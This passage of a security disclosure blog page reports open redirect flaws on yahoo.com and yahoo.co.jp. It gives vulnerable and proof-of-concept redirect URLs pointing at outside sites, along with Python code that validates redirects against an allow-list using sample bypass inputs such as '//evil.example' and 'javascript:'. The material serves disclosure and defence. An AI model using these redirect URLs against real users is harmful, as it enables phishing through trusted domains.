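    host = parts.hostname  # lower-cased, userinfo and port removed
    if not host:
        return False
    return host in allowed_hosts  # exact match, never endswith/startswith


def choose_redirect(target, fallback="/", allowed_hosts=ALLOWED_HOSTS) -> str:
    """Pick the value for the Location header: the requested destination if
    it passes validation, otherwise a safe same-origin fallback."""
    return target if is_safe_redirect(target, allowed_hosts) else fallback


if __name__ == "__main__":
    # Constructed sample values such an endpoint might receive in ?dest=...
    samples = [
        "/account/settings",
        "https://login.example.com/?next=/mail",
        "HTTPS://WWW.EXAMPLE.COM:443/inbox",
        "//evil.example/landing",
        "/\\evil.example/landing",
        "https://www.example.com@evil.example/",
        "https://www.example.com.evil.example/",
        "javascript:void(0)",
        "https://evil.example/\t",
        "",
    ]
    for s in samples:
        print(f"{s!r:45} -> {choose_redirect(s)!r}")
```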
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The following may be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with the above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of reports on the following web security issues have been published here: Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories and solution details related to Open Redirect vulnerabilities and cyber intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1) Yahoo.com Open Redirect</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">yahoo.com</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Yahoo Inc. (styled as Yahoo!) is an American multinational technology company headquartered in Sunnyvale, California. It is globally known for its Web portal, search engine Yahoo Search, and related services, including Yahoo Directory, Yahoo Mail, Yahoo News, Yahoo Finance, Yahoo Groups, Yahoo Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo websites every month. Yahoo itself claims it attracts more than half a billion consumers every month in more than 30 languages. Yahoo was founded by Jerry Yang and David Filo in January 1994 and was incorporated on March 1, 1995. Marissa Mayer, a former Google executive, serves as CEO and President of the company." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URLs:</b> (the ad-click handler treats everything after "/*" in the path as the destination; the first link below is the original, which ends at help.yahoo.com, and the two that follow simply replace that destination with http://www.google.com)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Poc Video:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=k4eFLsTyZkg">https://www.youtube.com/watch?v=k4eFLsTyZkg</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Another Yahoo Open Redirect Vulnerability Video Published Before:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=GTd1Gkj6OUY" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=GTd1Gkj6OUY</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html">http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2) <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">yahoo.co.jp</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Yahoo! JAPAN Corporation (ヤフージャパン株式会社 Yafū Japan Kabushiki-gaisha?) is a Japanese internet company formed as a joint venture between the American internet company Yahoo! and the Japanese internet company SoftBank. It is headquartered at Midtown Tower in the Tokyo Midtown complex in Akasaka, Minato, Tokyo. Yahoo! Japan was listed on JASDAQ in November 1997. In January 2000, it became the first stock in Japanese history to trade for more than ¥100 million per share. The company was listed on the Tokyo Stock Exchange in October 2003 and became part of the Nikkei 225 stock market index in 2005. Yahoo! Japan acquired the naming rights for the Fukuoka Dome in 2005, renaming the dome as the "Fukuoka Yahoo! Japan Dome". The "Yahoo Dome" is the home field for the Fukuoka SoftBank Hawks, a professional baseball team majority owned by SoftBank." (Wikipedia)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">One webpage is used as the redirect target for the following tests. Its address is "<a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a>". Suppose that this webpage is malicious.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b> (the VIEW_URL parameter is used as the redirect destination; the POC below shows that its host is not checked)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp" target="_blank">http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope" target="_blank">http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
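<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The Python below is an added example written for this page; it is not Yahoo's CGI code and not code from any of the linked advisories. It pulls the destination out of the two URL shapes shown in sections (1) and (2) (the part after "/*" in the ad-click path, and the VIEW_URL query parameter), shows the unvalidated behaviour that makes both of them open redirects, and then a hardened version that only lets a destination through when its host is an exact match on an allow-list. The allow-list, the site origin and every function name are assumptions made for the example; the sample query strings are the ones quoted above.</span></div>

```python
"""Added example (not Yahoo's code): extracting the redirect destination from the
two URL shapes quoted in this advisory and validating it against a host allow-list.

Everything named here is hypothetical except the sample URLs, which are the ones
quoted in the advisory text."""
from urllib.parse import parse_qs, urljoin, urlsplit

# Hypothetical allow-list: the only hosts this site should ever send a browser to.
ALLOWED_HOSTS = {"order.store.yahoo.co.jp", "shopping.yahoo.co.jp", "help.yahoo.com"}
SITE_ORIGIN = "https://order.store.yahoo.co.jp"  # assumed origin of the redirecting handler


def target_from_view_url(query: str) -> str:
    """Shape (2): the destination arrives in the VIEW_URL query parameter,
    possibly percent-encoded (parse_qs decodes it)."""
    return parse_qs(query).get("VIEW_URL", [""])[0]


def target_from_ard_path(path: str) -> str:
    """Shape (1): the ad-click handler takes everything after the first '/*'
    in the request path as the destination."""
    _head, sep, target = path.partition("/*")
    return target if sep else ""


def vulnerable_location(target: str) -> str:
    """What the vulnerable handlers effectively do: the client-supplied value
    becomes the Location header with no check on its host."""
    return target


def safe_location(target: str, allowed_hosts=ALLOWED_HOSTS, default="/") -> str:
    """Hardened version: only http(s) destinations whose host is on the
    allow-list (exact match, no suffix matching) survive; anything else falls
    back to a local default page.

    Also blocks the usual ways of smuggling a foreign host past a naive check:
    scheme-relative '//evil', backslashes (browsers treat '\\' like '/'),
    control characters, and userinfo tricks such as 'http://good-host@evil'."""
    if not target or target.startswith("//") or any(c in target for c in "\\\t\r\n\x00"):
        return default
    try:
        # A bare path such as "/items" is resolved against our own origin and stays local.
        resolved = urljoin(SITE_ORIGIN + "/", target)
        parts = urlsplit(resolved)
    except ValueError:          # e.g. malformed IPv6 brackets in the host
        return default
    if parts.scheme not in ("http", "https"):
        return default          # javascript:, data:, and friends
    if parts.username is not None or parts.password is not None:
        return default          # some clients would pick a different host here
    if (parts.hostname or "").lower() not in allowed_hosts:
        return default          # exact host match only
    return resolved


if __name__ == "__main__":
    # The two VIEW_URL values quoted in section (2).
    benign = target_from_view_url(
        "ITRACK_INFO=087836355102152107140219030344&COOKIE_PATH=/"
        "&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp")
    poc = target_from_view_url(
        "ITRACK_INFO=087836355102152107140219030330&COOKIE_PATH=/"
        "&COOKIE_DOMAIN=.yahoo.co.jp&VIEW_URL=http://www.inzeed.com/kaleidoscope")
    print(vulnerable_location(poc), "->", safe_location(poc))        # foreign host blocked
    print(vulnerable_location(benign), "->", safe_location(benign))  # allowed host kept
    # The ad-click shape from section (1), destination after "/*".
    ard = target_from_ard_path("/SIG=153ldvf0k/A=4763404/R=8/*http://www.google.com")
    print(vulnerable_location(ard), "->", safe_location(ard))
```

<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The design point is that the check runs on the parsed host, after resolving relative paths against the site's own origin, and compares it for equality with a fixed set; a substring or prefix test such as "contains yahoo.co.jp" is exactly the kind of check that "http://shopping.yahoo.co.jp@www.inzeed.com/" or "http://shopping.yahoo.co.jp.evil.example/" walks through.</span></div>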
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Poc Video:</b></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be">https://www.youtube.com/watch?v=2SM78WKAVr8&feature=youtu.be</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Blog:</b></span></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Articles:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/88">http://seclists.org/fulldisclosure/2014/Dec/88</a></span></div>
<div style="margin: 0px;">
<a href="http://marc.info/?l=full-disclosure&m=141897158416178&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=141897158416178&w=4</span></a></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01467.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01467.html</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://hackertopic.wordpress.com/2015/01/15/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/">https://hackertopic.wordpress.com/2015/01/15/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/110001022997295385049/posts/4GTENtJY9XE">https://plus.google.com/110001022997295385049/posts/4GTENtJY9XE</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/justqdjing/status/546910373169741825">https://twitter.com/justqdjing/status/546910373169741825</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/pcwebsecurities/posts/701648936647693">https://www.facebook.com/pcwebsecurities/posts/701648936647693</a><br /><a href="http://homehut.lofter.com/post/1d226c81_6e6884f">http://homehut.lofter.com/post/1d226c81_6e6884f</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://tetraph.wordpress.com/2014/12/28/yahoo-open-redirect/">https://tetraph.wordpress.com/2014/12/28/yahoo-open-redirect/</a><br /><a href="http://itinfotech.tumblr.com/post/118511508076/securitypost-yahoo-and-yahoo-japan-may-be">http://itinfotech.tumblr.com/post/118511508076/securitypost-yahoo-and-yahoo-japan-may-be</a><br /><a href="https://computerpitch.wordpress.com/2015/01/27/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/">https://computerpitch.wordpress.com/2015/01/27/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://testingcode.lofter.com/post/1cd26eb9_73096b9"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://testingcode.lofter.com/post/1cd26eb9_73096b9</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lifegrey.tumblr.com/post/120767572004/yahoo-url-redirection-bug"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lifegrey.tumblr.com/post/120767572004/yahoo-url-redirection-bug</span></a></div>
